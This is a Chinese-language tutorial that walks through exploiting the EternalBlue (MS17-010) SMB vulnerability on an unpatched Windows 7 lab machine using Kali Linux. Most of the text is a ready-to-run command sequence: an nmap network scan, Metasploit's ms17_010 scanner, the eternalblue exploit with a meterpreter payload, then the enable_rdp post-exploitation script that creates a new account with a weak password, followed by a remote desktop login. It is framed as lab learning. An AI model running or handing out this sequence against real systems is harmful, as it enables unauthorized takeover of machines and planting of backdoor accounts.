寫在之前
永恆之藍是2017年4月14日晚,黑客團體Shadow Brokers(影子經紀人)公佈一大批網絡攻擊工具,其中包含“永恆之藍”工具,“永恆之藍”利用Windows系統的SMB漏洞可以獲取系統最高權限。5月12日,不法分子通過改造“永恆之藍”製作了wannacry勒索病毒,英國、俄羅斯、整個歐洲以及中國國內多個高校校內網、大型企業內網和政府機構專網中招,被勒索支付高額贖金才能解密恢復文件。
準備工作
pc:windows7(未安裝補丁)和kali linux
尋找目標靶機
ifconig#查看本機的ip地址
nmap 192.168.1.0/24#掃描局域網內的其他主機
以ip爲192.168.1.5的主機爲靶機
使用msfconsole
msfconsole是一個強大的接口程序是一個一體化的集中控制檯。通過msfconsole,你可以訪問和使用所有的metasploit的插件,payload,利用模塊,post模塊等等。
msfconsole#進入msfconsole
use auxiliary/scanner/smb/smb_ms17_010#用來掃描漏洞
show option#查看需要設置的內容
yes的內容是需要設置的
set rhosts 192.168.1.5
run #執行進行掃描
來自有道翻譯
use exploit/windows/smb/ms17_010_eternalblue#調用永恆之藍攻擊模塊
show option
有些內容已經填寫,我們只需要填寫靶機的ip地址和攻擊方式
set rhost 192.168.1.5
set payload windows/x64/meterpreter/bind_tcp#設置攻擊載荷
exploit#執行攻擊
遠程登錄win7
run post/windows/manage/enable_rdp #啓動enable——rdp腳本
run post/windows/manage/enable_rdp USERNAME=icbug PASSWORD=123456#創建用戶
重新創建一個終端
rdesktop 192.168.1.5
輸入剛纔創建的賬號密碼
至此,我們就通過永恆之藍這個漏洞,登錄到win7系統上了。
整個過程主要是學習了GitChat的博客,最後附上原文的連接:https://blog.csdn.net/valada/article/details/104190432?utm_medium=distribute.pc_relevant.none-task-blog-baidujs-4